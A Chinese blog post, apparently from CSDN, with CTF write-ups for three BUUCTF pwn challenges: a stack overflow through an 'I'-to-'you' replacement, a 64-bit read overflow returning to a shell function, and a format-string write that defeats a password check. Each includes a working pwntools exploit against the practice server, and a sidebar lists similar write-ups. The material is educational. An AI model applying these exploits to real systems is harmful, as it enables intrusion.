BUUCTF PWN(2)

最新推荐文章于 2024-11-19 19:55:45 发布
最新推荐文章于 2024-11-19 19:55:45 发布
阅读量321 收藏
点赞数
分类专栏: PWN 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_60794823/article/details/127078997
版权

pwn1_sctf_2016

首先先用checksec查看开启了什么保护
在这里插入图片描述可以看到只开启了NX保护,即堆栈不可执行
用32位的IDA打开附件,shift+f12查看字串
在这里插入图片描述
发现cat flag字串双击跟进,找到调用函数的地址:0X8048F0D
在这里插入图片描述

打开main函数
在这里插入图片描述
查看vuln函数,发现存在栈溢出漏洞的函数,**fgets(s, 32, edata)**这里对gets作出了限制,
32(0x20)而s的大小0x3c>0x20所以不能造成溢出 。
这道题就不能解决了吗,结果肯定不是这样的仔细查看C代码可以发现,replace函数实现了字符串替换,将I替换为you,并将结果重组赋值给s
在这里插入图片描述
在这里插入图片描述

s大小是0x3c即60,60/3=20即二十个I即可填满s所占的大小加上32位的四字节大小。payload的即为:

payload = 'I' * 20 + 'aaaa' + p32(0x8048F0D)

构建exp:

from pwn import *

p = remote("node4.buuoj.cn",29336)

payload = 'I' * 20 + 'aaaa' + p32(0x8048F0D)

p.sendline(payload)

p.interactive()

得到flag
在这里插入图片描述

jarvisoj_level0

用checksec检查开启了什么保护,发现还是只开启了NX堆栈不可执行在这里插入图片描述
接下来用64位的IDA打开文件,按shift+f12查看字串,发现/bin/sh
在这里插入图片描述
双击它查看哪个函数调用了这个字串,查看该函数的地址信息
在这里插入图片描述
在这里插入图片描述
点开main函数,没发现什么有用的信息,点击vulnerable_function()函数
发现read函数可以读出两百个字节大小的空间,而buf只有80个字节大小,构成栈溢出
在这里插入图片描述
查看buf,由于是六十四位的文件距离返回地址要加上0x8的大小,接下来构造payload:

'a' * 0x88 + p64(0x40059A)

编写exp:

from pwn import *

p = remote("node4.buuoj.cn",25525)

payload = 'a' * 0x88 + p64(0x40059A)

p.sendline(payload)

p.interactive()

得到flag
在这里插入图片描述
在这里插入图片描述

[第五空间2019 决赛]PWN5

用checksec检查开启了什么保护,发现除了PIE都打开了,那么这道题就要绕过Canary了。题目开启了 Canary 保护, 往往需要和 格式化字符串漏洞利用联系起来
在这里插入图片描述
首先介绍一下什么是Canary保护机制

在函数开始时就随机产生一个值,将这个值CANARY放到栈上紧挨ebp的上一个位置,当攻击者想通过缓冲区溢出覆盖ebp或者ebp下方的返回地址时,一定会覆盖掉CANARY的值;当程序结束时,程序会检查CANARY这个值和之前的是否一致,如果不一致,则不会往下运行,从而避免了缓冲区溢出攻击。

那么既然开启了Canary保护,首先想到格式化字符串漏洞,用32位的IDA打开,先用老方法shit+f12查看/bin/sh的地址
在这里插入图片描述
发现它就在main函数里面,打开main函数查看反编译代码
![在这里插入图片描述](https://img-blog.csdnimg.cn/6a16c2dd0ab94d46b0a4d64265265f79.png

函数的功能是读入一个4位的随机密码,再将我们输入的密码与随机生成数比较,相同就执行system,printf存在格式化字符串漏洞

漏洞利用

检索字符在栈上偏移量,AAAA的16进制ASCII码为0X41414141而0X41414141距离AAAA的偏移量为10
在这里插入图片描述

我们可以先把0x804c044这个地址先写到偏移值为10的地址中,然后利用 %10$n把4写入到这个地址中去,然后再将密码写为4就可以达到目的
构建payload:

p32(0x804c044) + p32(0x804c045) + p32(0x804c046) + p32(0x804c047) + '%10$n%11$n%12$n%13$n'

编写exp:

from pwn import *

p = remote("node4.buuoj.cn",25664)

payload = p32(0x804c044) + p32(0x804c045) + p32(0x804c046) + p32(0x804c047) + '%10$n%11$n%12$n%13$n' 

p.sendafter("name:",payload)
p.sendafter("passwd",str(0x10101010))

p.interactive()

得到flag
在这里插入图片描述
在这里插入图片描述

BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1104
利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
BUUCTF PWN wp--[第五空间2019 决赛]PWN5
2302_81740139的博客
09-01 1006
在这个上下文中,%10$n表示写入的值将是printf的第10个参数,但由于p32(0x804C044)没有在printf调用中作为参数,它实际上利用了格式化字符串漏洞,将栈上的某个值写入到地址0x804C044。p32函数将32位整数转换为其小端序的字符串表示,这里转换的是地址0x804C044,这个地址应该是之前提到的全局变量dword_804C044的地址。这个变量似乎是一个全局变量,其地址是硬编码的(例如,在ELF文件中,地址可能是一个固定的地址)。如果之前的利用成功,这将提供一个shell。
buuctfpwn2~10)
yw__y的博客
03-30 1356
BUUCTF Pwn pwn2_sctf_2016
MrTreebook的博客
03-13 388
BUUCTF Pwn pwn2_sctf_20161.checksec2.IDA32vuln函数漏洞利用3.exp 1.checksec 没有canary,方便溢出 没有PIE,构造ROP会方便很多 2.IDA32 vuln函数 int vuln() { char nptr[32]; // [esp+1Ch] [ebp-2Ch] BYREF int v2; // [esp+3Ch] [ebp-Ch] printf("How many bytes do you want me to rea
BUUCTF-pwn(2)
njh18790816639的博客
11-06 706
[第五空间2019 决赛]PWN5 该函数漏洞比较明显,进行调试验证! 并且没有开启PIE保护措施,所以我们可以利用任意地址写,写入.bss:0804C044 password该地址处数据即可。 然后密码就被操控了。 [OGeek2019]babyrop 将urandom中一个随机数写入到buf中,然后作为参数传入到下一个函数中。 必须通过条件才可以可利用到下面的栈溢出漏洞!而且read还可以溢出一个字节到v5上。这里strlen遇到’\x00‘停止检测,所有外面可以利用该特征,绕过检测!
BUUCTF pwn2_sctf2016
红叶的博客
11-01 579
难点:绕过字符串大小限制以及是否掌握了ret2libc。
buuctf-pwn(二)
CHAWUCIREN1的博客
10-15 2169
ciscn_2019_n_1 直接运行一波 猜数字的 checksec file一下 放入ida 发现func函数里面有 东西 这个是一道溢出,我们输入的数字给v1,但是在进行判断的时候,用的是v2,我们需要溢出v2,使其等于目标值 查看一下栈空间 我们发现v2在栈上04的位置,也就是(0x30-4) 11.28125转化为十六进制为0x41348000 pay load= b’A’*(0x30-4) + p64(0x41348000) from pwn import * payload =
BUUCTF PWN rip1 WP
m0_54262894的博客
07-31 2878
BUUCTF PWN rip 1 这是一个WP,也是一个自己练习过程的记录。 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单 我们运行一下试试,它让你输入一段字符然后将字符输出。 把文件放在ida中查看一下 发现main函数并不复杂,只是定义了一个 s ,而且我们很容易就能找到栈溢出的点,我们都知道gets函数是一个危险函数,对于我们来说它可以接受到无限的字符,所以这里就是我们要pwn掉的点。 我们双击 s ,看它有多少空...
BUUCTF PWN方向 1-6 详解wp
qq_62564422的博客
02-06 2527
构造payload:变量声明后顺序入栈,每个标识表示变量所占栈空间底部,s为输入的变量,则其需要覆盖的长度为0X3C~0X00(0X3C字节),0X00处表示返回地址值(4字节)需要覆盖;返回地址的数据(8字节)(被垃圾数 据覆盖后则改为访问之后地址)+(返回地址 地址数+1)(远程端使用了ubuntu18,ubuntu18以上版本调用64位程序中的system函数需要栈对齐,在执行system时有一个指令需要栈对齐 ,所以地址+1)而且这个空间是连续的,v1之后就是v2,他们的内存块是接在一起的。
BUUCTF pwn pwn2_sctf_2016
菜的只能随便写写博客
02-18 2619
0x01 分析   0x02 运行  程序读入一个长度,然后按照长度读入后面输入的data并回显。   0x03 IDA  数据长度被限制为32,无法溢出,接着查看get_n函数。  接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是unsigned int,而前面判断长度的类型是int,可以规避长度限制。   0x04 思路  输入负数长度,绕过长度检查,执行r...
BUUCTF PWN-堆总结 2021-09-27
m0_56897090的博客
09-27 2352
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
[BUUCTF]PWN2——rip
mcmuyanga的博客
08-23 1831
[BUUCTF]-rip 目网址:https://buuoj.cn/challenges#rip 步骤: 例行检查附件,64位程序,没有开启任何保护 nc一下,看看输入点的提示字符串,让我们写入一个字符串,然后回显ok,bye 用对应位数的ida打开,shift+f12先来查看一下程序里有的字符串 这里可以看到有bin/sh还有system函数,对于这两个我们比较敏感,因为system(/bin/sh)这句代码能让我们直接获取shell 双击bin/sh跟进,然后安装ctrl+x查看一下哪里调用了这
buuctf pwn2_sctf_2016
carol2358的博客
04-22 291
32的libc rop 64位是7f(8位),32位是f7(4位) exp: from pwn import * from LibcSearcher import * local_file = './pwn2_sctf_2016' local_libc = '/usr/lib/x86_64-linux-gnu/libc-2.29.so' remote_libc = './libc.s...
BUUCTF pwn——pwn2_sctf_2016
CNS-Enterprise BCC-1701-J
04-18 448
BUUCTF练习
BUUCTFPWN(WP2)
NANMUZN的博客
03-08 226
嘻嘻
BUUCTF PWN-----第2:rip
2301_76990965的博客
11-19 264
s是需要输入的参数我们要做的是把s塞满到达/bin/sh。新建py文档输入下图所示内容,在命令提示符里执行即可获得。/bin/sh是可执行命令的终端用来执行用户输入的命令。进行如下图操作双击main然后按下F5键查看c语言代码。s的长度是15,塞满跳转到fun执行/bin/sh。将其拖入IDA中按shift+F12如下图。/bin/sh在fun函数里。
buuctf pwn2
2301_80477504的博客
02-05 1372
原理顾名思义,ret to syscall,就是调用系统函数以达到getshell的目的在计算中,系统调用是一种编程方式,计算机程序从该程序中向执行其的操作系统内核请求服务。这可能包括与硬件相关的服务(例如,访问硬盘驱动器),创建和执行新进程以及与诸如进程调度之类的集成内核服务进行通信。系统调用提供了进程与操作系统之间的基本接口。至于系统调用在其中充当什么角色,稍后再看,现在我们要做的是:让程序调用execve(“/bin/sh”,NULL,NULL)函数即可拿到shell。
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 1854
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
BUUCTF-PWN日记()
weixin_45461609的博客
05-15 348
BUUCTF-PWN日记ciscn_2019_n_8not_the_same_3dsctf_2016 ciscn_2019_n_8 送分… ''' Author:3nc0de Date:2020/05/15 ''' from pwn import * r = process('./pwn') #r = remote('node3.buuoj.cn', port) payload=p32(0x11)*14 r.sendline(payload) r.interactive() not_the
buuctf pwn level2
最新发布
03-29
好的,我现在要解决BUUCTF PWN level2的问。首先,我需要了解目的大致情况。根据用户提供的引用内容,可能涉及到堆溢出、格式化字符串漏洞或者栈溢出等常见PWN类型。不过具体到level2,可能需要更多的信息,但...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值